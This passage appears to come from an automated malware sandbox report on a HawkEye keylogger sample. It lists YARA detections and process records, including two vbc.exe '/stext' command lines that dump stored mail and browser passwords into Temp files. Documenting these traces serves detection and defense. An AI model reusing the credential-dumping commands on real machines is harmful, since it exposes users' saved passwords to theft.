                                                                                                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:low

                                                                                                                                                      General

                                                                                                                                                      Target ID:12
                                                                                                                                                      Start time:11:56:44
                                                                                                                                                      Start date:11/03/2022
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                                                                                                                                                      Imagebase:0x7ff7748d0000
                                                                                                                                                      File size:1171592 bytes
                                                                                                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000000.306975405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000002.310652543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000000.306290437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000000.305733767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Target ID:13
                                                                                                                                                      Start time:11:56:45
                                                                                                                                                      Start date:11/03/2022
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:1171592 bytes
                                                                                                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000000.307280478.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      No disassembly